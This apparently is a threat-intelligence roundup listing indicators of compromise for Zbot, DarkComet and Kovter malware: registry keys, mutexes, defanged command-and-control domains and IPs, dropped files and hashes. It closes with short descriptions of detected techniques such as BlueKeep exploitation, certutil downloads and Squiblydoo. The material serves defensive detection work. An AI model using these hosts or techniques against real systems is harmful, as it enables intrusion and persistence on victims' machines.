2472010f8a211d4f72f5f7a54eed173e18ba6917f399cfdb0b027470c596245a 31afe208c90bf9c7ac0b76e514a32b177e61364955e28aa55eca5cd1827a8c2e 4928a22b4ebfd6e3b0e9e7d7b1bf72ad48de3ac71fb60a9995c73c0b4458d12c 740f9355737182ffca17434bf2c2424dd9b848be7fff43d9a8bd28c2e136eb68 8c78b6edb8eeb2ee1463c1f5f7201cd35160a00e4f69b2f8bc3e65d2dcbf82fb a3519f9118dedddd5dbda9fc892767e2f5c3409d7126f9c3b2bc215bfa6fe7c3 a3ee74e64db675e110826e277017e8547202ab2cc450bc76af94206adfecbabb b3571fdfb17151d7c362fd223d6dd7c2196413674e44478ae7c361b9976623d4 e98d4eb2956d82eb27be7f87c8a26a598810a736771a79d1ac84d205669a6ee6 ef015203c761eab82b0db940209a9c5602dca16883b116b5dc8da380f489f924 f359049cfeec1982826bb7782147e57c42d6df1b142bb6c135bf2048f08152a1

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella



MITRE ATT&CK





Win.Packed.Zbot-9773448-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 47 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {2EC645E8-BA31-AD44-55BA-04D54CAC27C8}
7
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 7
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ
Value Name: 17e59651
1
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ
Value Name: 2e6fg30f
1
<HKCU>\SOFTWARE\MICROSOFT\IRKEQ
Value Name: 1c530fij
1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL
Value Name: 1j037349
1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL
Value Name: d3915hf
1
<HKCU>\SOFTWARE\MICROSOFT\DIOHL
Value Name: 1f51aa07
1
<HKCU>\SOFTWARE\MICROSOFT\SYFI
Value Name: 78i3a05
1
<HKCU>\SOFTWARE\MICROSOFT\SYFI
Value Name: 28i58667
1
<HKCU>\SOFTWARE\MICROSOFT\SYFI
Value Name: 3heae23
1
<HKCU>\SOFTWARE\MICROSOFT\JIDO
Value Name: 15aj5a2j
1
<HKCU>\SOFTWARE\MICROSOFT\JIDO
Value Name: 2c60jjf5
1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY
Value Name: 1d6h2idh
1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY
Value Name: 2h1d068f
1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT
Value Name: 2j12gbfb
1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT
Value Name: ig0e93h
1
<HKCU>\SOFTWARE\MICROSOFT\CIIHWY
Value Name: 18e3h87f
1
<HKCU>\SOFTWARE\MICROSOFT\IWAXT
Value Name: 33j42d95
1
Mutexes Occurrences
Global\{C30C6CF2-932B-408E-55BA-04D54CAC27C8} 7
Global\{73DE6ED9-9100-F05C-55BA-04D54CAC27C8} 7
Global\{A9348FD8-7001-2AB6-55BA-04D54CAC27C8} 7
Global\{A9348FDF-7006-2AB6-55BA-04D54CAC27C8} 7
Local\{C8D239CA-C613-4B50-55BA-04D54CAC27C8} 7
Local\{C8D239CB-C612-4B50-55BA-04D54CAC27C8} 7
GLOBAL\{<random GUID>} 7
Local\{<random GUID>} 7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]217[.]6[.]196 7
173[.]14[.]200[.]1 5
24[.]87[.]40[.]226 5
66[.]26[.]229[.]73 5
184[.]58[.]195[.]152 4
50[.]84[.]160[.]82 4
74[.]254[.]232[.]66 4
24[.]252[.]35[.]28 4
96[.]8[.]224[.]44 4
74[.]142[.]175[.]10 4
69[.]158[.]169[.]23 4
81[.]248[.]45[.]65 4
108[.]22[.]230[.]25 4
204[.]79[.]197[.]200 3
72[.]209[.]62[.]166 3
174[.]51[.]6[.]110 3
80[.]101[.]92[.]168 3
69[.]119[.]68[.]31 3
89[.]103[.]204[.]29 3
186[.]11[.]7[.]191 3
65[.]48[.]29[.]60 3
75[.]216[.]128[.]229 3
76[.]243[.]100[.]9 3
72[.]10[.]131[.]45 2
74[.]197[.]137[.]129 2
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
betneqxoxsgondrgtzdhxtif[.]com 2
bisqwdizeahjvlxoifhuwfud[.]info 2
cqjrjnqwjvgyzhabiobizrxoif[.]biz 2
hmpndhpdqgahvsceqypxgey[.]ru 2
hxdzdzxqokvijvkzxcaeuhukgmiz[.]biz 2
iraeivaecqovcurggyzpcqugkvnvga[.]net 2
ivivdbihycjnkjhifqocihnrxs[.]net 2
mrtkaqztpgudkjgelfdhnvdinj[.]com 2
nbrpnrlobinobduqceumzgayttc[.]info 2
onytsgmbeueifazhewcpztqsgmsw[.]com 2
pfapbtrszxbynqclzjfxelbeq[.]org 2
pmjqwmvdzdzttxkfhmfuobtl[.]com 2
pnrmjlxrkfasgusrohbyjrtsgm[.]ru 2
qshididaizdmnocmddhqgnvau[.]org 2
qsqwjbmzaepdpxazhwfalmr[.]info 2
rcvivmvoztgdyuwnfrwcmxwmrcqh[.]org 2
ukgiytxmnijpnsgyxcmfdaupt[.]biz 2
tklxkbqwfqdijvtkibyxwgpjr[.]ru 2
uglbqhercsgdzdszlfexbirkd[.]com 2
wgdxgrllxcpfgajzifhtkuc[.]ru 2
vkypzptwlrgycqmcqtkojeihaq[.]info 2
ayydtgoztdeobrnbswxyhivl[.]ru 2
beyhrshuguucxobxoylxsobalz[.]biz 2
bymfljnjjzeugullozlrnrwovifin[.]net 2
dqldugazhroylorhipjbubyqyti[.]org 2
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 25
%TEMP%\tmpbedf3695.bat 1
%TEMP%\tmp067792e0.bat 1
%TEMP%\tmp29825de5.bat 1
%TEMP%\tmp5386a2fe.bat 1
%TEMP%\tmp579e8252.bat 1
%TEMP%\tmp5bd33adf.bat 1
%TEMP%\tmp07452386.bat 1

File Hashes

009b772a99c3a0c2a1a229fda80da8533b4eb537f313f4146e15ad0ad232835e 016ec02d4b22262403e7fa831c23bf76741e73857bb1d2e7d589336c680dcab9 020ac993b08805eb5b05176f48f719fbf88fd10ead008a65e6495247a2c4eb03 020d4899e1540b265f7cf99b9a09a97ad74069a0c3c196c7dee2bbd5af7d15bf 028e7d817c109690ac9799ba17df60ac20c0f91be074626679b20203e3dbad4f 02a4466aa0e9b5a10f3b88a273f8292cd050fa87c3f78eecbb926afdcf4457a5 046cd1724c9da747b3b2279a0ab9d54cc0550725adf8b8a057b7d4a517211cb7 0481f124d71427c56338955f58a91a260b1ba8636dd1dfb08fd693efe104d1a6 04c056e40bd76e3f9c9b933279131b8542e19a37193ec0f15d35e5d6b7655273 04c1536ea51576559546670637eb66bfc1a7a12d508baa8467abb4369bac087d 06e1fcba5c68e19d5aa7ba8414762e155610baee4132899d9c16b26e9f6c11c1 08572e1d511711d7ae14bb0f1f4e4217c93bc22bd63546259c817010c583f95f 08824fa4518694a30ab8c336c6d3c3af2771b6a0b675d38bd1297d6ed200e451 0a60b5294101e37b561fdc5ff3187f6b456a60349eefc656f58438cc97877e8b 0af82035e588f1c326336e7140b4af77ab4fddd18623e7ad0df162d813f02190 0b34b234b68efabd864652f6634b7683aa97ebd987fac10eb3837a0305dd5b58 0b4a62a0c6bf615ca890921114d3494e6d28193b831559f4d1ec5420b3ec9d5b 0b4de45348fa100db4260647472ef31e17a0ee8a1700522cc1bb2620528826c7 0b71228014e578dbdad91cfcd2f6a3ca46bd5d0b2efbd1d386fe1609c45a5ade 0ce617ffc98db4f6ec3fc671a8d2ebe0ee781e9751da3ab0ccc41e1d9e0035bc 0cf67747dac7654c589941e62881c3278c0f609a6681ba5ed75c0c80c1fbc56a 0f45fc933ac4f098c512ba5c8545c7ae043f2ae8282d3cc8d4ebe18d8610fcab 0fd683025548558877095f19ae8958f269ecc4c79f0bb3b6d7649350351815bf 10091085a3324fe2baf7d664c0e010f5bd78e8df47d802c8eeebf580eba30069 1301d9f644984661fb6a88182c1e2ed251106a82bc98f2fcadc066214b45689b
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.DarkComet-9772960-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\TASKBAND
Value Name: FavoritesRemovedChanges
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Adobe Photoshop
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Adobe Photoshop
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{3208RF83-73JI-UAN5-O8ME-26UN30T71N27} 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{3208RF83-73JI-UAN5-O8ME-26UN30T71N27}
Value Name: StubPath
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iexplorer
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: System32
2
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: NewIdentification
1
<HKCU>\SOFTWARE\-=NETFLIX=-
Value Name: NewGroup
1
<HKCU>\SOFTWARE\OUTLAST-14-08 1
<HKCU>\SOFTWARE\OUTLAST-14-08
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\OUTLAST-14-08
Value Name: NewIdentification
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{8TGFG46H-1HA6-06D3-W4H2-11700U3B045B} 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AdobePhotoshop
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AdobePhotoshop
1
<HKCU>\SOFTWARE\JOHN 1
<HKCU>\SOFTWARE\JOHN
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\JOHN
Value Name: NewIdentification
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{8TGFG46H-1HA6-06D3-W4H2-11700U3B045B}
Value Name: StubPath
1
<HKCU>\SOFTWARE\17/08/2015 1
Mutexes Occurrences
_x_X_BLOCKMOUSE_X_x_ 6
_x_X_PASSWORDLIST_X_x_ 6
_x_X_UPDATE_X_x_ 6
***MUTEX*** 6
***MUTEX***_SAIR 6
***MUTEX***_PERSIST 5
Administrator5 4
xXx_key_xXx 4
{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3} 4
<random, matching '[A-Z0-9]{14}'> 4
0H5O44L47G1435Administrator15 1
KRU8D05D61LR75Administrator15 1
0H5O44L47G1435_SAIR 1
0H5O44L47G1435_RESTART 1
KRU8D05D61LR75_SAIR 1
KRU8D05D61LR75_RESTART 1
H48IHQL3P3B8KSAdministrator15 1
71D1NLMU3MUS37Administrator15 1
H48IHQL3P3B8KS_SAIR 1
H48IHQL3P3B8KS_RESTART 1
71D1NLMU3MUS37_SAIR 1
71D1NLMU3MUS37_RESTART 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
counterstrikexxx[.]no-ip[.]biz 4
zzzzzzzzzzz[.]no-ip[.]biz 2
floripamilgrau[.]no-ip[.]biz 1
john1991[.]no-ip[.]org 1
Files and or directories created Occurrences
%TEMP%\XX--XX--XX.txt 6
%TEMP%\UuU.uUu 6
%TEMP%\XxX.xXx 6
%APPDATA%\logs.dat 6
%TEMP%\Administrator7 4
%TEMP%\Administrator8 4
%TEMP%\Administrator2.txt 4
%APPDATA%\98B68E3C 4
%APPDATA%\98B68E3C\ak.tmp 4
%APPDATA%\Administrator-wchelper.dll 4
\default.html 3
%SystemRoot%\SysWOW64\install 3
%SystemRoot%\explorer 3
%SystemRoot%\explorer\explorer.exe 3
%SystemRoot%\SysWOW64\install\iexplorer.exe 2
%SystemRoot%\Win32 1
%SystemRoot%\SysWOW64\install\explorer.exe 1
%SystemRoot%\SysWOW64\system 1
%SystemRoot%\SysWOW64\system\explorer.exe 1
%SystemRoot%\Win32\windows.exe 1
%SystemRoot%\DASDASDA 1
%SystemRoot%\DASDASDA\TYTYTYT.exe 1
%APPDATA%\098E95FF\ak.tmp 1
%System32%\install\explorer.exe 1

File Hashes

007730b6a156a117e4f88a929b8c5f1b95869d7fb848edf3ba03bfb071fa75cf 3522e80335d2c7a3c3b52f6f1165a367076c0cc2aa3373693edeb32a78e85fda 4f03bedea9cbc328544670030a5464db88cedda803a7729f912b104a7be5f6c0 55dd70221585c371f9b88a6daa54c974c7e8c6d24ca334b5e484507a87db796e 5b49001de0bfb4cf84659520cc2c98872a001fefbb6c127a024874cbd78b1d71 b19bbecc27dcb938dc99d60991b5e4f2ff2fef0fb17626bdc2e43da882fc8a44 c2d03a5a544ee18cd17f05a05e3178d8aed779f0e2ad0adf34afa648555f79a1 c54c688ff66fc26c593b0715f946b2ea5a0ab4f612b6ea4c4ffdfa4b6be5ec8d c73781692e32f6b27244ee7c2b927a4df71bf7a4e008a75f119cbb90abab02d5 d81946222b7d67e923744d0e84084fc072d6c848465da155631d03f925c0909f

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Kovter-9770937-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: svchost.exe
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: explorer.exe
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: iexplore.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: svchost.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: explorer.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION
Value Name: iexplore.exe
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 18f8f764
19
<HKCU>\SOFTWARE\07771B47
Value Name: 18f8f764
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 956299e5
19
<HKCU>\SOFTWARE\07771B47
Value Name: 956299e5
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 8de2c2e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: 8de2c2e8
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47 19
<HKCU>\SOFTWARE\07771B47 19
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: 412841e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: 412841e8
19
<HKCU>\SOFTWARE\07771B47
Value Name: e1616c62
19
<HKLM>\SOFTWARE\WOW6432NODE\07771B47
Value Name: e1616c62
19
<HKCU>\SOFTWARE\07771B47
Value Name: 921a72e2
19
Mutexes Occurrences
C77D0F25 19
Global\07771b47 19
244F2418 19
906A2669 19
Global\2c6cc948 1
<random, matching [a-zA-Z0-9]{5,9}> 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
6[.]172[.]110[.]228 1
201[.]215[.]167[.]131 1
97[.]235[.]190[.]241 1
40[.]71[.]137[.]232 1
124[.]111[.]188[.]126 1
90[.]138[.]227[.]164 1
202[.]115[.]161[.]126 1
181[.]81[.]151[.]50 1
201[.]23[.]14[.]143 1
170[.]168[.]155[.]208 1
141[.]210[.]47[.]144 1
89[.]233[.]158[.]94 1
138[.]77[.]169[.]108 1
209[.]73[.]195[.]196 1
153[.]210[.]7[.]202 1
18[.]194[.]29[.]180 1
79[.]185[.]132[.]120 1
165[.]186[.]14[.]97 1
144[.]101[.]81[.]211 1
12[.]141[.]6[.]226 1
194[.]76[.]104[.]40 1
192[.]17[.]197[.]43 1
217[.]86[.]10[.]90 1
91[.]219[.]84[.]240 1
162[.]77[.]163[.]121 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
cpanel[.]com 1
httpd[.]apache[.]org 1
bugs[.]launchpad[.]net 1
manpages[.]debian[.]org 1
artree[.]jp 1

File Hashes

182d5c7d5ce6de99976e71d209369b13fc50b39096cec58dc71ce1960f4d5a4d 1ee19c580c7268d6285e0c82b645dca1e559d5e2185ea212ff5b9583ccf17bc5 22fee6fcfc138e9da761ec0d4d18f992fc8c5fcb5ddf2c9eefdff527526cddd3 23985f5f3941e691982bd1a4be39ea5ec99c7f20c2abc255a6a932de11667e8e 3ba1f62c87662f1ed2b6a88665780ad3c59d5babe98a47f25a5a6d1f572d232a 3be96d5845f57e8b05307bdf7701df977547a1d6369d0eba825acf97030e57ba 450328b5a05f8ebc8d09b60d3d079594599c117eebc024bb07624138164baf45 524f6f99b1f3298f80c013af319e3282e7897f734e580f352982cdd25e36a7e6 59f1a4d7e0607d6f23ea81c0c6284b5f6702ed188ed258f00098444f0b38b482 5ac5e4ddc7659e83b5d0ac2621a87d57a18c4176dffde9de8844f2ff9000ad84 68334273995b82e16c118b761616d2593a24836e6f0ca5e6b02abbc1e0ed2284 856cc73b1da6f52fa691541cab7eecdc5c6e3e85370514f649302729a8ba197f 95a9df1c371dd97b2668ba4f0753523d2feb54d6e93e03cbbc9183ddc792f3f5 a28ccd19535900d344ad05e5f1334b957813709437a71f5f92aede7316b98153 c4299089028b3b078066fab390e5251859dd961c3df02a589a2cac79dbb8cef7 dfea664ec12d1ce9d22a17837eb0f13ad0bcee39eb868845d4affd08a49fa83b e094e02e50f22244134668a8a2b3646b6938761cf1601c234a5717247b4b66b9 eeaac2487fcc673e3edefa4f8f51ac282dbce0156fe0c762390b1f72d08f02f8 fc70b1fbba62129d3efc2ed265bf8a55eee2089773b92067f60a9533a8315a61

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (5216)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (3808)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
CVE-2019-0708 detected - (1860)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Installcore adware detected - (1622)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Certutil.exe is downloading a file - (1530)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
XMRig Miner Detected - (1255)
Command line options indicating usage of XMRig Miner have been detected. Malware sometimes uses compromised hosts to mine for cryptocurrency on behalf of the attacker.
Kovter injection detected - (1067)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (682)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Crystalbit-Apple DLL double hijack detected - (541)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Excessively long PowerShell command detected - (493)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.